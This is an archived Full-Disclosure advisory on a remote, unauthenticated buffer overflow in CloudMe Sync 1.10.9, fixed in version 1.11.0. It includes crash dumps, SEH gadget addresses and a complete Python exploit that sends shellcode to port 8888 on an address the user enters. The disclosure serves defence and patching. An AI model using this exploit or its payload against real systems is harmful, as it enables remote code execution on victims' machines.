lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 11 Feb 2018 09:14:01 +0200
From: SecuriTeam SSD <ssd@...ondsecurity.com>
To: fulldisclosure@...lists.org
Subject: [FD] SSD Advisory – CloudMe Unauthenticated Remote Buffer Overflow

Full report: https://blogs.securiteam.com/index.php/archives/3669
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD

The following advisory describes one (1) vulnerability found in CloudMe.

CloudMe is “a file storage service operated by CloudMe AB that offers cloud
storage, file synchronization and client software. It features a blue
folder that appears on all devices with the same content, all files are
synchronized between devices.”

The vulnerability found is a buffer overflow vulnerability, which when
exploited can be used to cause the product to execute arbitrary code.

Credit
A security researcher from, hyp3rlinx, has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
The vendor has released CloudMe version 1.11.0 which addresses this
vulnerability.

Affected version
CloudMe Sync version v1.10.9 and prior

Vulnerability Details
An unauthenticated remote attackers that can connect to the “CloudMe Sync”
client application listening on port 8888, can send a malicious payload
causing a buffer overflow condition. This will result in an attacker
controlling the programs execution flow and allowing arbitrary code
execution on the victims PC.

CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)

In Qt5Core:
00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9   . 890424         MOV DWORD PTR SS:[ESP],EAX
00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>;
Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst

Buffer overflow condition
EIP register will be overwritten at about 1075 bytes.

EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141


Stack dump information
(508.524): Access violation - code c0000005 (first/second chance not
available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000
edi=00000000
eip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
 efl=00010246
41414141 ??              ???
Exploitation is very easy as ASLR SafeSEH are all set to false making the
exploit portable and able to work across different operating systems. We
will therefore use Structured Exceptional Handler overwrite for our exploit.

e.g.


6FE6909D     0x6fe6909d : pop ebx # pop esi # ret 0x20 |
{PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v-1.0-
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795     0x00476795 : pop ebx # pop esi # ret 0x20 | startnull
{PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v-1.0-
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6     0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |
{PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v5.9.0.0
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)

Exploit
import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ')

nseh="\xEB\x06"+"\x90"*2                #JMP
seh=struct.pack('<L',0x61e7b7f6)        #POP,POP RET
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc

def PwnMe(ip,payload):
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip,8888))
    s.send(payload)
    print 'Sending buffer overflow packetz'
    raw_input()


if __name__ == '__main__':
    PwnMe(ip,payload)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ